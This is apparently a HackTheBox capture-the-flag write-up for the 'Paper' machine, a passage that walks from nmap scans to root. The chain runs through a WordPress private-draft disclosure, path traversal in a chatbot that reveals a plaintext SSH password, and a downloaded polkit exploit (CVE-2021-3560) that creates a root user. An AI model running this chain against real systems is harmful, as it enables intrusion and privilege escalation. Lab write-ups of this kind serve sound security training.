Paper - [HTB]

Cover Image for Paper - [HTB]

Table of Contents


    Paper is a pretty easy Linux machine from HackTheBox where the attacker will have to exploit a WordPress vulnerability (CVE-2019-17671), so we can get access to a chat web application, exploiting the services of a chatbot and becoming user. Finally, we will have to exploit the famous polkit vulnerability (CVE-2021-3560) in order to become root.


    As always, let's start finding all opened ports in the machine with Nmap.

    kali@kali:~/Documents/HTB/Paper$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt
    Warning: giving up on port because retransmission cap hit (2).
    Nmap scan report for
    Host is up (0.043s latency).
    Not shown: 61511 closed ports, 4021 filtered ports
    22/tcp  open  ssh
    80/tcp  open  http
    443/tcp open  https

    Then, we continue with a deeper scan of each opened port, getting more information about each service.

    kali@kali:~/Documents/HTB/Paper$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80,443
    Nmap scan report for
    Host is up (0.042s latency).
    22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
    | ssh-hostkey: 
    |   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
    |   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
    |_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
    80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
    |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    |_http-title: HTTP Server Test Page powered by CentOS
    443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
    |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
    | http-methods: 
    |_  Potentially risky methods: TRACE
    |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    |_http-title: HTTP Server Test Page powered by CentOS
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
    | Subject Alternative Name: DNS:localhost.localdomain
    | Not valid before: 2021-07-03T08:52:34
    |_Not valid after:  2022-07-08T10:32:34
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn: 
    |_  http/1.1
    Service detection performed. Please report any incorrect results at .
    # Nmap done at Mon Feb 14 15:19:20 2022 -- 1 IP address (1 host up) scanned in 16.38 seconds

    Looking at the HTTP headers, we can find the domain office.paper.

    kali@kali:~/Documents/HTB/Paper$ curl -i
    HTTP/1.1 404 Not Found
    Date: Mon, 14 Feb 2022 21:09:28 GMT
    Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
    X-Backend-Server: office.paper
    Content-Length: 196
    Content-Type: text/html; charset=iso-8859-1
    <title>404 Not Found</title>
    <h1>Not Found</h1>
    <p>The requested URL was not found on this server.</p>

    Once added to /etc/hosts, we can access 's WordPress page.

    Blunder Tiffin

    Thanks to wpscan, we can know that this WordPress version has an associated vulnerability.

    kali@kali:~/Documents/HTB/Paper$ wpscan --url http://office.paper/ -e ap,at,dbe,u --random-user-agent --detection-mode aggressive --plugins-detection aggressive --disable-tls-checks
    | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
     |     Fixed in: 5.2.4
     |     References:
     |      -
     |      -
     |      -
     |      -
     |      -
     |      -

    Exploitation 1

    We can exploit it, accessing the URL http://office.paper/?static=1, obtaining a bunch of drafts. Between the drafts, we can see a register link.

    Micheal please remove the secret from drafts for gods sake!
    Hello employees of Blunder Tiffin,
    Due to the orders from higher officials, every employee who were added to this blog is removed and they are migrated to our new chat system.
    So, I kindly request you all to take your discussions from the public blog to a more private chat system.
    # Warning for Michael
    Michael, you have to stop putting secrets in the drafts. It is a huge security issue and you have to stop doing it. -Nick
    Threat Level Midnight
    Inside the FBI, Agent Michael Scarn sits with his feet up on his desk. His robotic butler Dwigt….
    # Secret Registration URL of new Employee chat system
    # I am keeping this draft unpublished, as unpublished drafts cannot be accessed by outsiders. I am not that ignorant, Nick.
    # Also, stop looking at my drafts. Jeez!

    This link leads us to a web application.

    Once registered and logged in, we can find a bot on the general with instructions about how to use it.

    Bot chat

    To interact with recyclops, we need to create a private chat.

    Recyclops private chat

    As we can see, recyclops can list files under the /sales/ folder.


    Exploitation 2

    Moreover, it is vulnerable to Path Traversal, so we can list files from upper directories.

    dwight's home directory

    Under the ../hubot/ directory there is a .env file .

    hubot files

    The .env contains recyclop's credentials.

    Configuration file

    These credentials can be used to get the machine as Dwight through SSH.

    kali@kali:~/Documents/HTB/Paper$ ssh dwight@office.paper
    dwight@office.paper's password: Queenofblad3s!23
    [dwight@paper ~]$ cat user.txt 

    Privilege Escalation

    Using Linpeash, we find that the polkit binary is a SUID binary.

    SUID - Check easy privesc, exploits and write perms
    -rwsr-xr-x. 1 root root  61K May 11  2019 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)            
    -rwsr-xr-x  1 root root  34K May 11  2019 /usr/bin/fusermount3             
    -rwsr-xr-x. 1 root root  38K May 11  2019 /usr/bin/fusermount
    -rwsr-xr-x. 1 root root  18K May 11  2019 /usr/lib/polkit-1/polkit-agent-helper-1               
    -rwsr-xr-x  1 root root  65K Nov  8  2019 /usr/bin/crontab
    -rwsr-xr-x  1 root root  33K Apr  6  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                                                           
    -rwsr-xr-x  1 root root  21K Feb  2  2021 /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper (Unknown SUID binary)

    So, we can exploit it becoming root with the following exploit.

    [dwight@paper tmp]$ wget
    --2022-02-14 17:06:44--
    Connecting to connected.
    HTTP request sent, awaiting response... 200 OK                                          
    Length: 2434 (2.4K) [text/plain]                                             
    Saving to: ‘’                                                           100%[==============>]   2.38K  --.-KB/s    in 0s       
    2022-02-14 17:06:44 (295 MB/s) - ‘’ saved [2434/2434]                                                                                                                                                                                                  
    [dwight@paper tmp]$ python3 
    [+] Timed out at: 0.00890119250816805
    [+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root 
    bash: cannot set terminal process group (79814): Inappropriate ioctl for device
    bash: no job control in this shell
    [root@paper tmp]#  cat /root/root.txt